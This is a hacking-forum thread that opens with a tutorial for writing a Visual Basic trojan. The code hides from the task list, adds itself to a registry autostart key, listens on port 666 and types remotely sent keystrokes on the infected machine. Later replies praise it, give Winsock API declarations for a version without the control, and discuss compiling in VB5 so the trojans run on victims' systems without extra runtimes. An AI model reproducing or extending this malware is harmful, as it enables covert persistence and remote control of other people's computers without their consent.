Basic Trojan In Visual Basic

ComSec

Sep 22 2003, 05:08 PM

here is a tut i come across....for VB programmers

--------------------------------

Basic Trojan In Visual Basic
By: Swampy
lord_swampy@hotmail.com
mIRC: #hackers, #ereased #hacking
---------------------------------

About:
In this litle tutorial i will learn you to make a small trojan that starts everytime
windows is started. On more thing, you cant se it in the Ctrl + Alt + Del screen.
In the code all the green text is comments, you don´t have to include them in the
code. When someone has opened the trojan you can connect to it with telnet, and
when you are connected you can press a key and then the infected computer also
presses that key. Hope you have fun with your new knowlege...

Start Programming:
Start with adding a new component into your project. Add the component that is named
"Microsoft Winsock Controls". Now i wont tell you anything else you have to putt into
the form.

Private Sub Form_Load()
App.TaskVisible = False 'This hides your aplication from the Ctrl + Alt + Del screen.
'This adds your program to the windows registry so that it starts everytime windows starts
Dim Reg As Object
Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
winsock1.localport = "666" ' this sets your trojan´s port, you can change it if you want to
Winsock1.Listen 'This sets your trojan to listen for connections
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
'Got to do this to make sure the Winsock control isn't already being used.
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID 'Accept the client who connects

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
'If an error accour and the conection is lost, then this tells the winsock to listen again
Winsock1.Close
Winsock1.Listen
End Sub

Private Sub Winsock1_Close()
'same as Winsock1_Error above
Winsock1.Close
Winsock1.Listen
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim data1 As String 'Define the variable to store the recived data from
Winsock1.GetData data1 'Gets data from client and store it in the variable data1
DoEvents 'The computer takes a small break to get all the data
SendKeys data1 'Send the data to the infected computers keybord
End Sub

man-FIRE

Sep 22 2003, 10:17 PM

Thx mec
Good Tutorial for news People in vb
I make a Scanner BOt In Vb For IRC a post (bientot)

agamemnon

Sep 22 2003, 11:06 PM

Ouais

- y'en a encore une! Salut!

Yeah cheers ComSec, great post! - It's a shame you can't write scripts like that for WSH/VBS

never mind

I'm sure the next Windows'll have far more exciting scripting holes!

coder

Oct 3 2003, 03:40 PM

here is some useful malware VB Code that i wrote...

http://forums.governmentsecurity.org/index...wtopic=3082&hl=

molf52

Feb 8 2004, 11:33 AM

It's very interesting tutorial, but can we do something like a "trojan" or a remote control application without inserting in the main form the winsock control? Thats because a lot of workstations have not register this ActiveX. Is it possible to use an API and if we can do that how? Thank you..

coder

Feb 8 2004, 03:16 PM

QUOTE (molf52 @ Feb 8 2004, 11:33 AM)

It's very interesting tutorial, but can we do something like a "trojan" or a remote control application without inserting in the main form the winsock control? Thats because a lot of workstations have not register this ActiveX. Is it possible to use an API and if we can do that how? Thank you..

i think the whole idea of coding it in BASIC was to explain common principles with out getting to complicaterd. If you're looking for serious implementations of such techniques i'd suggest you move on to anothe language/suite. VB really isn't the coder's choice when it comes to this kind of malware =)

i'd be more than willing to work with some other members to throw together some nice code... any suggestions?

Faceless Master

Feb 8 2004, 03:26 PM

QUOTE (coder @ Feb 8 2004, 03:16 PM)

QUOTE (molf52 @ Feb 8 2004, 11:33 AM)

It's very interesting tutorial, but can we do something like a "trojan" or a remote control application without inserting in the main form the winsock control? Thats because a lot of workstations have not register this ActiveX. Is it possible to use an API and if we can do that how? Thank you..

i think the whole idea of coding it in BASIC was to explain common principles with out getting to complicaterd. If you're looking for serious implementations of such techniques i'd suggest you move on to anothe language/suite. VB really isn't the coder's choice when it comes to this kind of malware =)

i'd be more than willing to work with some other members to throw together some nice code... any suggestions?

I disagree.Visual Basic is a powerful language.All you need is a little research.
To make a trojan without winsock in Visual Basic use the C-Socket Class from http://www.vbip.com
Rest,have you seen Mosucker?
~Regards
Faceless Mater

ComSec

Feb 8 2004, 04:12 PM

QUOTE

C-Socket Class

thanks for the heads up FM been looking for an alternative to winsock and inet...

MrRobot

Feb 8 2004, 05:30 PM

Cant make a thread-Sorry.

Am looking for The PGP SDK ; Along with any type of SSL SDK. Both either freebies ;p or at a resaonable price.

Please let me know,.

A2

Feb 8 2004, 07:15 PM

QUOTE (Faceless Master @ Feb 8 2004, 03:26 PM)

QUOTE (coder @ Feb 8 2004, 03:16 PM)

QUOTE (molf52 @ Feb 8 2004, 11:33 AM)

It's very interesting tutorial, but can we do something like a "trojan" or a remote control application without inserting in the main form the winsock control? Thats because a lot of workstations have not register this ActiveX. Is it possible to use an API and if we can do that how? Thank you..

i think the whole idea of coding it in BASIC was to explain common principles with out getting to complicaterd. If you're looking for serious implementations of such techniques i'd suggest you move on to anothe language/suite. VB really isn't the coder's choice when it comes to this kind of malware =)

i'd be more than willing to work with some other members to throw together some nice code... any suggestions?

I disagree.Visual Basic is a powerful language.All you need is a little research.
To make a trojan without winsock in Visual Basic use the C-Socket Class from http://www.vbip.com
Rest,have you seen Mosucker?
~Regards
Faceless Mater

if you're familiar with sockets in general, you can call the windows winsock apis directly with out using mswinsck.ocx, i've included some declares and types, should be enough to get someone started...

CODE

Public Const WSADESCRIPTION_LEN = 257
Public Const WSASYS_STATUS_LEN = 129

Public Type WSAData
wVersion As Integer
wHighVersion As Integer
szDescription As String * WSADESCRIPTION_LEN
szSystemStatus As String * WSASYS_STATUS_LEN
iMaxSockets As Integer
iMaxUdpDg As Integer
lpVendorInfo As Long
End Type

Public Type hostent
h_name As Long
h_aliases As Long
h_addrtype As Integer
h_length As Integer
h_addr_list As Long
End Type

Public Type in_addr
s_addr As Long
End Type
'
Public Type sockaddr_in
sin_family As Integer
sin_port As Integer
sin_addr As in_addr
sin_zero(0 To 7) As Byte
End Type

Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Dest As Any, Source As Any, ByVal nbytes As Long)
Public Declare Function WSACleanup Lib "ws2_32.dll" () As Long
Public Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long
Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVR As Long, lpWSAD As WSAData) As Long

Public Declare Function inet_addr Lib "ws2_32.dll" (ByVal cp As String) As Long
Public Declare Function inet_ntoa Lib "ws2_32.dll" (ByVal inn As Long) As Long

Public Declare Function htonl Lib "ws2_32.dll" (ByVal hostlong As Long) As Long
Public Declare Function htons Lib "ws2_32.dll" (ByVal hostshort As Long) As Integer
'
Public Declare Function ntohl Lib "ws2_32.dll" (ByVal netlong As Long) As Long
Public Declare Function ntohs Lib "ws2_32.dll" (ByVal netshort As Long) As Integer

Public Declare Function closesocket Lib "ws2_32.dll" (ByVal s As Long) As Long
Public Declare Function connect Lib "ws2_32.dll" (ByVal s As Long, addr As sockaddr_in, ByVal addrlen As Long) As Long
Public Declare Function gethostbyname Lib "ws2_32.dll" (ByVal host_name As String) As Long
Public Declare Function recv Lib "ws2_32.dll" (ByVal s As Long, ByRef buf As Byte, ByVal datalen As Long, ByVal Flags As Long) As Long
Public Declare Function send Lib "ws2_32.dll" (ByVal s As Long, ByRef buf As Byte, ByVal datalen As Long, ByVal Flags As Long) As Long
Public Declare Function Socket Lib "ws2_32.dll" Alias "socket" (ByVal af As Long, ByVal s_type As Long, ByVal protocol As Long) As Long

it's true, visual basic is a powerfull language. i've actually achieved real process injection with it. but i would refrain from using it for this purpose due to the file dependancies. what use is an awesome trojan if you're subject doesn't have the latest vb runtimes installed?

coder

Feb 8 2004, 07:35 PM

QUOTE (Faceless Master @ Feb 8 2004, 03:26 PM)

I disagree.Visual Basic is a powerful language.All you need is a little research.
To make a trojan without winsock in Visual Basic use the C-Socket Class from http://www.vbip.com
Rest,have you seen Mosucker?
~Regards
Faceless Mater

i really don't want to start a flame, and while i know that VB is powerful. i stick by my statement... how many succesfull/popular/widely-used trojans/malware applications are written in Visual Basic? this is of course (IMO) because of the dependencies that VB is bound to (DLL's). And if you still really want to do this in VB, then I can re-write the code to use Winsock API (not difficult at all)!

QUOTE (A2)

it's true, visual basic is a powerfull language. i've actually achieved real process injection with it. but i would refrain from using it for this purpose due to the file dependancies. what use is an awesome trojan if you're subject doesn't have the latest vb runtimes installed?

a2 agrees with me

Faceless Master

Feb 9 2004, 08:55 AM

QUOTE (coder @ Feb 8 2004, 07:35 PM)

QUOTE (Faceless Master @ Feb 8 2004, 03:26 PM)

I disagree.Visual Basic is a powerful language.All you need is a little research.
To make a trojan without winsock in Visual Basic use the C-Socket Class from http://www.vbip.com
Rest,have you seen Mosucker?
~Regards
Faceless Mater

i really don't want to start a flame, and while i know that VB is powerful. i stick by my statement... how many succesfull/popular/widely-used trojans/malware applications are written in Visual Basic? this is of course (IMO) because of the dependencies that VB is bound to (DLL's). And if you still really want to do this in VB, then I can re-write the code to use Winsock API (not difficult at all)!

QUOTE (A2)

it's true, visual basic is a powerfull language. i've actually achieved real process injection with it. but i would refrain from using it for this purpose due to the file dependancies. what use is an awesome trojan if you're subject doesn't have the latest vb runtimes installed?

a2 agrees with me

I have attached a simple API Trojan.I dont have VB installed so i aint sure that the source i added is correct.
Anyhow,For those who say that ur applications need visual basic runtime,just compile your proggies in Visual Basic 5.Then your trojans will need msvbvm50.dll which is already present in Win98,Me,2k,XP.
*Peace Out*
~Faceless Master

Faceless Master

Feb 9 2004, 09:21 AM

One thing more.If you are unable to Open your Visual Basic 6 Projects into VB5,
just open the .vbp file into notepad and find the line
RETAINED=0
Delete it and save.Then you will be open your VB6 porjects in VB5.
~Regards
Faceless Master

TECHgenius

Feb 9 2004, 11:30 AM

Nice Find! thx.